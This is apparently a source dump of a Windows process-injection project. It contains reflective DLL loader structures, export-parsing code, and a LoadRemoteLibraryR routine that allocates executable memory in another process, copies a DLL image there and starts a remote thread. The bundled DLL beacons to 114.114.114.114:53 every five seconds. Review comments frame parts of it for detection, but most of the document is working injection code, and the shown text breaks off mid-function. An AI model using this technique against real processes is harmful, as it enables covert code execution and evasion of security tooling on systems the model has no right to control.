31 | will be produced, or you can set the Ignore Input Library property to Yes
32 | on the General property page of the Linker folder in the project's Property
33 | Pages dialog box.
34 |
35 | /////////////////////////////////////////////////////////////////////////////
36 | Other standard files:
37 |
38 | StdAfx.h, StdAfx.cpp
39 | These files are used to build a precompiled header (PCH) file
40 | named ReflectiveDLL.pch and a precompiled types file named StdAfx.obj.
41 |
42 | /////////////////////////////////////////////////////////////////////////////
43 | Other notes:
44 |
45 | AppWizard uses "TODO:" comments to indicate parts of the source code you
46 | should add to or customize.
47 |
48 | /////////////////////////////////////////////////////////////////////////////
49 |
--------------------------------------------------------------------------------
/ReflectiveDLL/ReflectiveDLL.def:
--------------------------------------------------------------------------------
1 | LIBRARY ReflectiveDLL
2 | EXPORTS
3 | ReflectiveLoader @ 1
--------------------------------------------------------------------------------
/ReflectiveDLL/ReflectiveDLL.vcxproj.filters:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx
7 |
8 |
9 | {93995380-89BD-4b04-88EB-625FBE52EBFB}
10 | h;hh;hpp;hxx;hm;inl;inc;xsd
11 |
12 |
13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
15 |
16 |
17 |
18 |
19 |
20 |
21 |
22 | Header Files
23 |
24 |
25 | Header Files
26 |
27 |
28 | Header Files
29 |
30 |
31 |
32 |
33 | Source Files
34 |
35 |
36 | Source Files
37 |
38 |
39 | Source Files
40 |
41 |
42 |
43 |
44 | Source Files
45 |
46 |
47 |
--------------------------------------------------------------------------------
/ReflectiveDLL/ReflectiveLoader.h:
--------------------------------------------------------------------------------
1 | #include
2 | #include
3 | #include
// Function-pointer types for the few Win32/NT routines the loader calls
// through. Presumably these are resolved at run time by hash (see the *_HASH
// constants below); the resolver itself is not part of this header.
typedef HMODULE(WINAPI * LOADLIBRARYA)(LPCSTR);
typedef FARPROC(WINAPI * GETPROCADDRESS)(HMODULE, LPCSTR);
typedef LPVOID(WINAPI * VIRTUALALLOC)(LPVOID, SIZE_T, DWORD, DWORD);
typedef DWORD(NTAPI * NTFLUSHINSTRUCTIONCACHE)(HANDLE, PVOID, ULONG);
typedef BOOL(WINAPI * DLLMAIN)(HINSTANCE, DWORD, LPVOID);
// Precomputed hashes of module names and export names. Presumably produced by
// hash() below (rotate-right by HASH_KEY, then add each byte), so any change to
// that routine or to HASH_KEY invalidates every constant here. Being fixed
// immediates in the binary, they also serve as a static signature of this loader.
#define KERNEL32DLL_HASH 0x6A4ABC5B
#define NTDLLDLL_HASH 0x3CFA685D

#define LOADLIBRARYA_HASH 0xEC0E4E8E
#define GETPROCADDRESS_HASH 0x7C0DFCAA
#define VIRTUALALLOC_HASH 0x91AFCA54
#define NTFLUSHINSTRUCTIONCACHE_HASH 0x534C0AB8


//ReflectiveDLLInjection.h
// Unchecked reads of a value of the given width at an arbitrary address.
// No validity or alignment check is made; the caller owns that.
#define DEREF( name )*(UINT_PTR *)(name)
#define DEREF_64( name )*(DWORD64 *)(name)
#define DEREF_32( name )*(DWORD *)(name)
#define DEREF_16( name )*(WORD *)(name)
#define DEREF_8( name )*(BYTE *)(name)

// Rotate count used by ror(); part of the hash definition, see above.
#define HASH_KEY 13
// Ask MSVC to emit _rotr inline rather than as a library call.
#pragma intrinsic( _rotr )
/// Rotate a 32-bit value right by HASH_KEY bits; one step of hash().
__forceinline DWORD ror(DWORD d)
{
    const DWORD rotated = _rotr(d, HASH_KEY);
    return rotated;
}
31 |
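/// Rotate-right-13 string hash over a NUL-terminated name.
///
/// For every byte: rotate the running value right by HASH_KEY, then add the
/// byte as a plain `char` (so bytes >= 0x80 are sign-extended where char is
/// signed, which is the MSVC default). The *_HASH constants at the top of this
/// header presumably come from exactly this arithmetic, so do not change the
/// signedness or the rotate count without regenerating them.
///
/// @param c  NUL-terminated string; must not be NULL.
/// @return   the hash; 0 for the empty string.
///
/// The original do/while evaluated `*++c` before testing, so an empty string
/// read one byte past its terminator. A plain while loop yields the same value
/// for every non-empty input and stops at the terminator. `register` is gone:
/// it never affected the result and is ill-formed from C++17 on.
__forceinline DWORD hash(char * c)
{
    DWORD h = 0;
    while (*c)
    {
        h = ror(h);
        h += *c;
        ++c;
    }

    return h;
}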
43 |
// Singly linked free-block node: next pointer plus size. The "0x8 bytes" note
// only holds for a 32-bit build; with 8-byte pointers the struct is 16 bytes.
// Only referenced from the commented-out part of __PEB below.
typedef struct _PEB_FREE_BLOCK // 2 elements, 0x8 bytes
{
    struct _PEB_FREE_BLOCK * pNext;
    DWORD dwSize;
} PEB_FREE_BLOCK, *PPEB_FREE_BLOCK;
49 |
50 |
// Local mirror of ntdll's UNICODE_STRING. Following that convention, Length
// and MaximumLength are byte counts (not character counts) and pBuffer is not
// guaranteed to be NUL-terminated — treat it as (pBuffer, Length), never as a
// C string.
typedef struct _UNICODE_STR
{
    USHORT Length;
    USHORT MaximumLength;
    PWSTR pBuffer;
} UNICODE_STR, *PUNICODE_STR;
57 |
58 |
// Loader bookkeeping block reached through __PEB.pLdr. The three LIST_ENTRY
// heads thread through the LDR_DATA_TABLE_ENTRY records declared below (same
// field names there), each list in a different order. The "0x28 bytes" note
// is for a 32-bit layout.
typedef struct _PEB_LDR_DATA //, 7 elements, 0x28 bytes
{
    DWORD dwLength;
    DWORD dwInitialized;
    LPVOID lpSsHandle;
    LIST_ENTRY InLoadOrderModuleList;
    LIST_ENTRY InMemoryOrderModuleList;
    LIST_ENTRY InInitializationOrderModuleList;
    LPVOID lpEntryInProgress;
} PEB_LDR_DATA, *PPEB_LDR_DATA;
69 |
70 |
// Process parameters block reached through __PEB.ProcessParameters. Only
// ImagePathName and CommandLine are named; Reserved1/Reserved2 pad up to them.
// The pad sizes are pointer-width dependent (PVOID[10]), so the offsets differ
// between x86 and x64 builds — NOTE(review): confirm against the target OS.
typedef struct _RTL_USER_PROCESS_PARAMETERS {
    BYTE Reserved1[16];
    PVOID Reserved2[10];
    UNICODE_STR ImagePathName;
    UNICODE_STR CommandLine;
} RTL_USER_PROCESS_PARAMETERS, *PRTL_USER_PROCESS_PARAMETERS;
// Process Environment Block, partial view.
//
// Only BeingDebugged, pLdr, ProcessParameters and SessionId are named; the
// Reserved* byte arrays pad everything else. The long commented-out field
// list appears to be the older full layout this was derived from and is not
// compiled; the "65 elements, 0x210 bytes" note belongs to that layout, not to
// the live fields.
//
// NOTE(review): the pads put pLdr at byte offset 24 (0x18) and
// ProcessParameters at 32 (0x20), which are the x64 PEB offsets (the x86 PEB
// keeps Ldr at 0x0C). The Win32 build log in this tree fails on
// __readgsqword, consistent with this header being used for x64 only — confirm.
typedef struct __PEB // 65 elements, 0x210 bytes
{
    //BYTE bInheritedAddressSpace;
    //BYTE bReadImageFileExecOptions;
    //BYTE bBeingDebugged;
    //BYTE bSpareBool;
    //LPVOID lpMutant;
    //LPVOID lpImageBaseAddress;
    //PPEB_LDR_DATA pLdr;
    //LPVOID lpProcessParameters;
    //LPVOID lpSubSystemData;
    //LPVOID lpProcessHeap;
    //PRTL_CRITICAL_SECTION pFastPebLock;
    //LPVOID lpFastPebLockRoutine;
    //LPVOID lpFastPebUnlockRoutine;
    //DWORD dwEnvironmentUpdateCount;
    //LPVOID lpKernelCallbackTable;
    //DWORD dwSystemReserved;
    //DWORD dwAtlThunkSListPtr32;
    //PPEB_FREE_BLOCK pFreeList;
    //DWORD dwTlsExpansionCounter;
    //LPVOID lpTlsBitmap;
    //DWORD dwTlsBitmapBits[2];
    //LPVOID lpReadOnlySharedMemoryBase;
    //LPVOID lpReadOnlySharedMemoryHeap;
    //LPVOID lpReadOnlyStaticServerData;
    //LPVOID lpAnsiCodePageData;
    //LPVOID lpOemCodePageData;
    //LPVOID lpUnicodeCaseTableData;
    //DWORD dwNumberOfProcessors;
    //DWORD dwNtGlobalFlag;
    //LARGE_INTEGER liCriticalSectionTimeout;
    //DWORD dwHeapSegmentReserve;
    //DWORD dwHeapSegmentCommit;
    //DWORD dwHeapDeCommitTotalFreeThreshold;
    //DWORD dwHeapDeCommitFreeBlockThreshold;
    //DWORD dwNumberOfHeaps;
    //DWORD dwMaximumNumberOfHeaps;
    //LPVOID lpProcessHeaps;
    //LPVOID lpGdiSharedHandleTable;
    //LPVOID lpProcessStarterHelper;
    //DWORD dwGdiDCAttributeList;
    //LPVOID lpLoaderLock;
    //DWORD dwOSMajorVersion;
    //DWORD dwOSMinorVersion;
    //WORD wOSBuildNumber;
    //WORD wOSCSDVersion;
    //DWORD dwOSPlatformId;
    //DWORD dwImageSubsystem;
    //DWORD dwImageSubsystemMajorVersion;
    //DWORD dwImageSubsystemMinorVersion;
    //DWORD dwImageProcessAffinityMask;
    //DWORD dwGdiHandleBuffer[34];
    //LPVOID lpPostProcessInitRoutine;
    //LPVOID lpTlsExpansionBitmap;
    //DWORD dwTlsExpansionBitmapBits[32];
    //DWORD dwSessionId;
    //ULARGE_INTEGER liAppCompatFlags;
    //ULARGE_INTEGER liAppCompatFlagsUser;
    //LPVOID lppShimData;
    //LPVOID lpAppCompatInfo;
    //UNICODE_STR usCSDVersion;
    //LPVOID lpActivationContextData;
    //LPVOID lpProcessAssemblyStorageMap;
    //LPVOID lpSystemDefaultActivationContextData;
    //LPVOID lpSystemAssemblyStorageMap;
    //DWORD dwMinimumStackCommit;
    BYTE Reserved1[2];
    BYTE BeingDebugged;            // offset 2
    BYTE Reserved2[21];
    PPEB_LDR_DATA pLdr;            // offset 24 (0x18) after pointer alignment
    PRTL_USER_PROCESS_PARAMETERS ProcessParameters; // offset 32 (0x20)
    BYTE Reserved3[520];
    //PPS_POST_PROCESS_INIT_ROUTINE PostProcessInitRoutine;
    BYTE Reserved4[136];
    ULONG SessionId;
} _PEB, *_PPEB;
154 |
// WinDbg> dt -v ntdll!_LDR_DATA_TABLE_ENTRY
//__declspec( align(8) )
// Loader module record, declared without its first LIST_ENTRY
// (InLoadOrderLinks). Because the list is walked from
// PEB_LDR_DATA.InMemoryOrderModuleList, a LIST_ENTRY pointer taken from that
// list presumably points straight at the start of this trimmed struct, which
// is why the first link is dropped (see the original comment below).
// NOTE(review): the fields after BaseDllName follow the WinDbg dump named
// above; verify against the target OS build before relying on
// Flags/LoadCount/TlsIndex/HashTableEntry.
typedef struct _LDR_DATA_TABLE_ENTRY
{
    //LIST_ENTRY InLoadOrderLinks; // As we search from PPEB_LDR_DATA->InMemoryOrderModuleList we dont use the first entry.
    LIST_ENTRY InMemoryOrderModuleList;
    LIST_ENTRY InInitializationOrderModuleList;
    PVOID DllBase;
    PVOID EntryPoint;
    ULONG SizeOfImage;
    UNICODE_STR FullDllName;
    UNICODE_STR BaseDllName;
    ULONG Flags;
    SHORT LoadCount;
    SHORT TlsIndex;
    LIST_ENTRY HashTableEntry;
    ULONG TimeDateStamp;
} LDR_DATA_TABLE_ENTRY, *PLDR_DATA_TABLE_ENTRY;
173 |
174 |
175 |
// One PE base-relocation entry: a 16-bit word whose low 12 bits are the
// offset within the relocation block's page and whose high 4 bits are the
// relocation type (IMAGE_REL_BASED_*). Relies on the compiler packing the two
// WORD bit-fields into a single WORD.
typedef struct
{
    WORD offset : 12;
    WORD type : 4;
} IMAGE_RELOC, *PIMAGE_RELOC;
#ifdef __cplusplus
extern "C" {
#endif

// Entry point exported by name from the DLL (ReflectiveDLL.def: "ReflectiveLoader @ 1").
// C linkage keeps the name unmangled so GetReflectiveLoaderOffset can find it
// with a substring search over the export-name table. Presumably defined in
// ReflectiveDLL.cpp (not shown here); what callAddress means and what the
// return value carries are not visible from this header.
ULONG_PTR WINAPI ReflectiveLoader(ULONG_PTR callAddress);

#ifdef __cplusplus
}
#endif
190 |
--------------------------------------------------------------------------------
/ReflectiveDLL/dllmain.cpp:
--------------------------------------------------------------------------------
1 | // dllmain.cpp : Defines the entry point for the DLL application.
2 | #include "ReflectiveLoader.h"
3 | #include
// Link against Winsock for the socket calls in TryConnect().
#pragma comment(lib,"Ws2_32.lib")
// Project-private ul_reason_for_call value handled in DllMain below; it is
// not one of the standard DLL_PROCESS_*/DLL_THREAD_* reason codes. The caller
// uses it to ask for the module handle through lpReserved.
#define DLL_QUERY_HMODULE 6
// Defined in another translation unit; set on DLL_PROCESS_ATTACH below.
extern HINSTANCE hAppInstance;
// Id of the payload thread created on DLL_PROCESS_ATTACH; written once,
// never read in this file.
DWORD dwThreadId;
// Test payload: a single TCP connect to 114.114.114.114:53, then teardown.
//
// This is the whole observable behaviour of the injected DLL (inj() calls it
// every five seconds): WSAStartup, a blocking connect() whose result is
// ignored, closesocket, WSACleanup. Nothing is sent or received. From a
// detection standpoint the artifact is a periodic outbound TCP/53 connection
// from a process that normally makes none.
//
// NOTE(review): socket() is not checked for INVALID_SOCKET, and SocketSendIn
// is not zero-initialised (sin_zero stays indeterminate). Harmless for a PoC,
// bugs anywhere else.
void TryConnect()
{
    WSADATA wsa;
    // Winsock 1.1 is enough for a plain TCP connect.
    if (WSAStartup(MAKEWORD(1, 1), &wsa) != 0)
    {
        return;
    }
    SOCKET m_socket = socket(AF_INET, SOCK_STREAM, 0);
    SOCKADDR_IN SocketSendIn;
    SocketSendIn.sin_family = AF_INET;
    SocketSendIn.sin_addr.S_un.S_addr = inet_addr("114.114.114.114");
    SocketSendIn.sin_port = htons(53);
    // Return value ignored: the attempt itself is the payload.
    connect(m_socket, (SOCKADDR*)&SocketSendIn, sizeof(SOCKADDR));
    closesocket(m_socket);
    WSACleanup();
}
// Payload thread body: call TryConnect() every 5 s, forever. There is no stop
// condition, so the thread lives as long as the host process.
//
// NOTE(review): DllMain casts this to LPTHREAD_START_ROUTINE although the
// signature differs (no LPVOID parameter, void return instead of DWORD); that
// is undefined behaviour strictly speaking, even if it works on the targets
// this was built for.
void WINAPI inj()
{
    while (1)
    {
        TryConnect();
        Sleep(5000);
    }
}
// DLL entry point.
//
// DLL_PROCESS_ATTACH records the module handle in hAppInstance and starts the
// payload thread (inj). DLL_QUERY_HMODULE (the project's own reason code 6)
// hands that handle back through lpReserved. Every other reason is a no-op.
// Always returns TRUE.
//
// NOTE(review): creating a thread from DllMain is documented by Microsoft as
// unsafe while the loader lock is held; a reflectively loaded module is not
// called through the normal loader, so whether that applies depends on the
// caller — confirm. The CreateThread handle is never closed (leaked), and
// bReturnValue is assigned but never returned.
BOOL APIENTRY DllMain( HINSTANCE hinstDLL,
    DWORD ul_reason_for_call,
    LPVOID lpReserved
    )
{
    BOOL bReturnValue = TRUE;
    switch (ul_reason_for_call)
    {
    case DLL_QUERY_HMODULE:
        // Caller passes an HMODULE* in lpReserved and gets the base back.
        if (lpReserved != NULL)
            *(HMODULE*)lpReserved = hAppInstance;
        break;
    case DLL_PROCESS_ATTACH:
        hAppInstance = hinstDLL;
        // Start the payload loop; the returned handle is discarded.
        CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)inj, NULL, 0, &dwThreadId);
        break;
    case DLL_THREAD_ATTACH:
    case DLL_THREAD_DETACH:
    case DLL_PROCESS_DETACH:
        break;
    }
    return TRUE;
}
55 |
56 |
--------------------------------------------------------------------------------
/ReflectiveDLL/stdafx.cpp:
--------------------------------------------------------------------------------
1 | // stdafx.cpp : source file that includes just the standard includes
2 | // ReflectiveDLL.pch will be the pre-compiled header
3 | // stdafx.obj will contain the pre-compiled type information
4 |
5 | #include "stdafx.h"
6 |
7 | // TODO: reference any additional headers you need in STDAFX.H
8 | // and not in this file
9 |
--------------------------------------------------------------------------------
/ReflectiveDLL/stdafx.h:
--------------------------------------------------------------------------------
1 | // stdafx.h : include file for standard system include files,
2 | // or project specific include files that are used frequently, but
3 | // are changed infrequently
4 | //
5 |
6 | #pragma once
7 |
8 | #include "targetver.h"
9 |
10 | #define WIN32_LEAN_AND_MEAN // Exclude rarely-used stuff from Windows headers
11 | // Windows Header Files:
12 | #include
13 | #include
14 |
15 |
16 | // TODO: reference additional headers your program requires here
17 |
--------------------------------------------------------------------------------
/ReflectiveDLL/targetver.h:
--------------------------------------------------------------------------------
1 | #pragma once
2 |
3 | // Including SDKDDKVer.h defines the highest available Windows platform.
4 |
5 | // If you wish to build your application for a previous Windows platform, include WinSDKVer.h and
6 | // set the _WIN32_WINNT macro to the platform you wish to support before including SDKDDKVer.h.
7 |
8 | #include
9 |
--------------------------------------------------------------------------------
/ReflectiveDLL/x64/Debug/ReflectiveDLL.Build.CppClean.log:
--------------------------------------------------------------------------------
1 | d:\users\sudo\documents\github\processinjection\reflectivedll\x64\debug\reflectivedll.pch
2 | d:\users\sudo\documents\github\processinjection\reflectivedll\x64\debug\vc140.pdb
3 | d:\users\sudo\documents\github\processinjection\reflectivedll\x64\debug\vc140.idb
4 | d:\users\sudo\documents\github\processinjection\reflectivedll\x64\debug\stdafx.obj
5 | d:\users\sudo\documents\github\processinjection\reflectivedll\x64\debug\dllmain.obj
6 | d:\users\sudo\documents\github\processinjection\reflectivedll\x64\debug\reflectivedll.obj
7 | c:\users\sudo\desktop\reflectivedllpeform\x64\debug\reflectivedll.ilk
8 | c:\users\sudo\desktop\reflectivedllpeform\x64\debug\reflectivedll.dll
9 | c:\users\sudo\desktop\reflectivedllpeform\x64\debug\reflectivedll.pdb
10 | c:\users\sudo\desktop\reflectivedllpeform\x64\debug\reflectivedll.lib
11 | c:\users\sudo\desktop\reflectivedllpeform\x64\debug\reflectivedll.exp
12 | d:\users\sudo\documents\github\processinjection\reflectivedll\x64\debug\reflectivedll.tlog\cl.command.1.tlog
13 | d:\users\sudo\documents\github\processinjection\reflectivedll\x64\debug\reflectivedll.tlog\cl.read.1.tlog
14 | d:\users\sudo\documents\github\processinjection\reflectivedll\x64\debug\reflectivedll.tlog\cl.write.1.tlog
15 | d:\users\sudo\documents\github\processinjection\reflectivedll\x64\debug\reflectivedll.tlog\link.command.1.tlog
16 | d:\users\sudo\documents\github\processinjection\reflectivedll\x64\debug\reflectivedll.tlog\link.read.1.tlog
17 | d:\users\sudo\documents\github\processinjection\reflectivedll\x64\debug\reflectivedll.tlog\link.write.1.tlog
18 | d:\users\sudo\documents\github\processinjection\reflectivedll\x64\debug\reflectivedll.tlog\reflectivedll.write.1u.tlog
19 |
--------------------------------------------------------------------------------
/ReflectiveDLL/x64/Debug/ReflectiveDLL.log:
--------------------------------------------------------------------------------
1 | stdafx.cpp
2 | dllmain.cpp
3 | ReflectiveDLL.cpp
4 | Creating library C:\Users\sudo\Desktop\ReflectiveDLLPEForm\x64\Debug\ReflectiveDLL.lib and object C:\Users\sudo\Desktop\ReflectiveDLLPEForm\x64\Debug\ReflectiveDLL.exp
5 | ReflectiveDLL.vcxproj -> C:\Users\sudo\Desktop\ReflectiveDLLPEForm\x64\Debug\ReflectiveDLL.dll
6 | ReflectiveDLL.vcxproj -> C:\Users\sudo\Desktop\ReflectiveDLLPEForm\x64\Debug\ReflectiveDLL.pdb (Full PDB)
7 |
--------------------------------------------------------------------------------
/ReflectiveDLL/x64/Debug/ReflectiveDLL.tlog/CL.command.1.tlog:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/sud01oo/ProcessInjection/6d89cee0f274b3fac1381c6e99ed18ef4ab899f2/ReflectiveDLL/x64/Debug/ReflectiveDLL.tlog/CL.command.1.tlog
--------------------------------------------------------------------------------
/ReflectiveDLL/x64/Debug/ReflectiveDLL.tlog/CL.read.1.tlog:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/sud01oo/ProcessInjection/6d89cee0f274b3fac1381c6e99ed18ef4ab899f2/ReflectiveDLL/x64/Debug/ReflectiveDLL.tlog/CL.read.1.tlog
--------------------------------------------------------------------------------
/ReflectiveDLL/x64/Debug/ReflectiveDLL.tlog/CL.write.1.tlog:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/sud01oo/ProcessInjection/6d89cee0f274b3fac1381c6e99ed18ef4ab899f2/ReflectiveDLL/x64/Debug/ReflectiveDLL.tlog/CL.write.1.tlog
--------------------------------------------------------------------------------
/ReflectiveDLL/x64/Debug/ReflectiveDLL.tlog/ReflectiveDLL.lastbuildstate:
--------------------------------------------------------------------------------
1 | #TargetFrameworkVersion=v4.0:PlatformToolSet=v140:EnableManagedIncrementalBuild=false:VCToolArchitecture=Native32Bit:WindowsTargetPlatformVersion=8.1
2 | Debug|x64|C:\Users\sudo\Desktop\ReflectiveDLLPEForm\|
3 |
--------------------------------------------------------------------------------
/ReflectiveDLL/x64/Debug/ReflectiveDLL.tlog/ReflectiveDLL.write.1u.tlog:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/sud01oo/ProcessInjection/6d89cee0f274b3fac1381c6e99ed18ef4ab899f2/ReflectiveDLL/x64/Debug/ReflectiveDLL.tlog/ReflectiveDLL.write.1u.tlog
--------------------------------------------------------------------------------
/ReflectiveDLL/x64/Debug/ReflectiveDLL.tlog/link.command.1.tlog:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/sud01oo/ProcessInjection/6d89cee0f274b3fac1381c6e99ed18ef4ab899f2/ReflectiveDLL/x64/Debug/ReflectiveDLL.tlog/link.command.1.tlog
--------------------------------------------------------------------------------
/ReflectiveDLL/x64/Debug/ReflectiveDLL.tlog/link.read.1.tlog:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/sud01oo/ProcessInjection/6d89cee0f274b3fac1381c6e99ed18ef4ab899f2/ReflectiveDLL/x64/Debug/ReflectiveDLL.tlog/link.read.1.tlog
--------------------------------------------------------------------------------
/ReflectiveDLL/x64/Debug/ReflectiveDLL.tlog/link.write.1.tlog:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/sud01oo/ProcessInjection/6d89cee0f274b3fac1381c6e99ed18ef4ab899f2/ReflectiveDLL/x64/Debug/ReflectiveDLL.tlog/link.write.1.tlog
--------------------------------------------------------------------------------
/ReflectiveDLL/x64/Debug/vc140.idb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/sud01oo/ProcessInjection/6d89cee0f274b3fac1381c6e99ed18ef4ab899f2/ReflectiveDLL/x64/Debug/vc140.idb
--------------------------------------------------------------------------------
/ReflectiveDLL/x64/Debug/vc140.pdb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/sud01oo/ProcessInjection/6d89cee0f274b3fac1381c6e99ed18ef4ab899f2/ReflectiveDLL/x64/Debug/vc140.pdb
--------------------------------------------------------------------------------
/ReflectiveDLL/x64/Release/ReflectiveDLL.log:
--------------------------------------------------------------------------------
1 |
--------------------------------------------------------------------------------
/ReflectiveDLLInjection/.vs/ReflectiveDLLInjection/v14/.suo:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/sud01oo/ProcessInjection/6d89cee0f274b3fac1381c6e99ed18ef4ab899f2/ReflectiveDLLInjection/.vs/ReflectiveDLLInjection/v14/.suo
--------------------------------------------------------------------------------
/ReflectiveDLLInjection/Debug/ReflectiveDLLInjection.log:
--------------------------------------------------------------------------------
1 |
--------------------------------------------------------------------------------
/ReflectiveDLLInjection/LoadRemoteLibraryR.cpp:
--------------------------------------------------------------------------------
1 | #include "LoadRemoteLibraryR.h"
2 | #include
// NOTE(review): file-scope using-directive; nothing in this file refers to
// std::, so it can be dropped.
using namespace std;
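/// Convert an RVA of an unmapped (file-form) PE image into a file offset.
///
/// @param dwRva         relative virtual address taken from a PE header field
/// @param uiBaseAddress start of the raw file image in memory (the DOS header)
/// @return the offset of dwRva within the raw image; dwRva unchanged when it
///         lies in the headers before the first section's raw data; 0 when no
///         section contains it.
///
/// No bounds checks are made on e_lfanew, NumberOfSections or the section
/// table, and at least one section is assumed: the buffer is trusted to be a
/// well-formed PE. The original fell off the end without a return statement
/// when no section matched (undefined behaviour); it now returns 0, which the
/// caller below (GetReflectiveLoaderOffset) does not check for.
DWORD Rva2Offset(DWORD dwRva, UINT_PTR uiBaseAddress)
{
    // NT headers live at e_lfanew from the DOS header.
    PIMAGE_NT_HEADERS pNtHeaders = (PIMAGE_NT_HEADERS)(uiBaseAddress + ((PIMAGE_DOS_HEADER)uiBaseAddress)->e_lfanew);
    // The section table immediately follows the optional header.
    PIMAGE_SECTION_HEADER pSectionHeader = (PIMAGE_SECTION_HEADER)((UINT_PTR)(&pNtHeaders->OptionalHeader) + pNtHeaders->FileHeader.SizeOfOptionalHeader);
    // Inside the headers: RVA and file offset coincide.
    if (dwRva < pSectionHeader[0].PointerToRawData)
        return dwRva;
    // Find the section whose virtual range holds the RVA and rebase it onto
    // that section's raw data.
    for (WORD wIndex = 0; wIndex < pNtHeaders->FileHeader.NumberOfSections; wIndex++)
    {
        const IMAGE_SECTION_HEADER &sec = pSectionHeader[wIndex];
        if (dwRva >= sec.VirtualAddress && dwRva < (sec.VirtualAddress + sec.SizeOfRawData))
            return (dwRva - sec.VirtualAddress + sec.PointerToRawData);
        //      \---- offset within section ----/ \--- section's file offset ---/
    }
    // Not inside any section.
    return 0;
}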
// Locate the exported ReflectiveLoader inside an unmapped DLL image.
//
// Walks the export directory of the raw file image at lpReflectiveDllBuffer
// (every RVA goes through Rva2Offset because the file is not mapped) and
// returns the file offset of the first export whose name contains
// "ReflectiveLoader", or 0 if there is none. LoadRemoteLibraryR below adds that
// offset to the address the raw image was copied to and starts a thread there,
// so the loader code has to run before any relocation has been applied.
//
// NOTE(review): strstr rather than strcmp — presumably so decorated forms of
// the name (leading underscore, "@N" suffix) still match; confirm. No bounds or
// signature checks are made, so a malformed buffer is read out of range.
// uiAddressArray is computed before the loop and again inside it; the first
// value is never read, so the early computation is redundant.
DWORD GetReflectiveLoaderOffset(VOID * lpReflectiveDllBuffer)
{
    // Base: start of the heap buffer the dropper allocated for the file image.
    UINT_PTR uiBaseAddress = (UINT_PTR)lpReflectiveDllBuffer;
    // File address of the NT headers.
    UINT_PTR uiExportDir = (UINT_PTR)uiBaseAddress + ((PIMAGE_DOS_HEADER)uiBaseAddress)->e_lfanew;
    // Address of the export data-directory entry.
    UINT_PTR uiNameArray = (UINT_PTR)&(((PIMAGE_NT_HEADERS)uiExportDir)->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT]);
    // Its VirtualAddress is the RVA of the export directory; convert it to the
    // in-buffer address of the IMAGE_EXPORT_DIRECTORY.
    uiExportDir = uiBaseAddress + Rva2Offset(((PIMAGE_DATA_DIRECTORY)uiNameArray)->VirtualAddress, uiBaseAddress);
    // In-buffer address of the name-pointer table (AddressOfNames).
    uiNameArray = uiBaseAddress + Rva2Offset(((PIMAGE_EXPORT_DIRECTORY)uiExportDir)->AddressOfNames, uiBaseAddress);
    // In-buffer address of the function address table (AddressOfFunctions).
    UINT_PTR uiAddressArray = uiBaseAddress + Rva2Offset(((PIMAGE_EXPORT_DIRECTORY)uiExportDir)->AddressOfFunctions, uiBaseAddress);
    // In-buffer address of the name-ordinal table (AddressOfNameOrdinals).
    UINT_PTR uiNameOrdinals = uiBaseAddress + Rva2Offset(((PIMAGE_EXPORT_DIRECTORY)uiExportDir)->AddressOfNameOrdinals, uiBaseAddress);
    // Number of named exports.
    DWORD dwCounter = ((PIMAGE_EXPORT_DIRECTORY)uiExportDir)->NumberOfNames;

    while (dwCounter--)
    {
        // Each name-table entry is an RVA and has to be turned into a file offset too.
        char *cpExportedFunctionName = (char *)(uiBaseAddress + Rva2Offset((*(DWORD*)uiNameArray), uiBaseAddress));
        if (strstr(cpExportedFunctionName, "ReflectiveLoader") != NULL)
        {
            // Re-derive the start of the address table (same value as above).
            uiAddressArray = uiBaseAddress + Rva2Offset(((PIMAGE_EXPORT_DIRECTORY)uiExportDir)->AddressOfFunctions, uiBaseAddress);
            // Index it by the ordinal that belongs to this name.
            uiAddressArray += (*(WORD*)(uiNameOrdinals) * sizeof(DWORD));

            // File offset of ReflectiveLoader, i.e. the start of its machine code.
            return Rva2Offset((*(DWORD*)uiAddressArray), uiBaseAddress);
        }
        uiNameArray += sizeof(DWORD);
        uiNameOrdinals += sizeof(WORD);
    }

    return 0;
}
62 |
63 |
64 |
65 |
// Copy an in-memory DLL image into hProcess and run its ReflectiveLoader.
//
// Steps: find the loader's file offset in lpBuffer (GetReflectiveLoaderOffset),
// allocate dwLength bytes in the target with PAGE_EXECUTE_READWRITE
// (VirtualAllocEx), copy the raw image over unchanged (WriteProcessMemory), and
// start a remote thread at buffer + offset (CreateRemoteThread) with
// lpParameter as its argument. Returns the thread handle, or NULL on any
// failure — including any structured exception, which the MSVC-specific
// __try/__except wrapper turns into NULL.
//
// From a detection point of view this is the textbook sequence
// VirtualAllocEx(RWX) -> WriteProcessMemory -> CreateRemoteThread into a
// private (non-image-backed) region, and the copied buffer still carries its
// PE headers.
//
// NOTE(review): the __except handler swallows every exception, including
// access violations caused by a malformed buffer, and reports them only as
// NULL. The remote allocation is never freed when a later step fails.
HANDLE WINAPI LoadRemoteLibraryR(HANDLE hProcess, LPVOID lpBuffer, DWORD dwLength, LPVOID lpParameter)
{
    //HMODULE hResult = NULL;
    DWORD dwThreadId;
    HANDLE hThread = NULL;
    __try
    {

        do
        {
            if (!hProcess || !lpBuffer || !dwLength)
                break;
            // Locate the loader inside the image.
            DWORD dwReflectiveLoaderOffset = GetReflectiveLoaderOffset(lpBuffer);
            if (!dwReflectiveLoaderOffset)
                break;
            // Allocate RWX memory in the target process.
            LPVOID lpRemoteLibraryBuffer = VirtualAllocEx(hProcess, NULL, dwLength, MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE);
            if (!lpRemoteLibraryBuffer)
                break;
            if (!WriteProcessMemory(hProcess, lpRemoteLibraryBuffer, lpBuffer, dwLength, NULL))
                break;
            // Thread start = remote base + file offset of the loader.
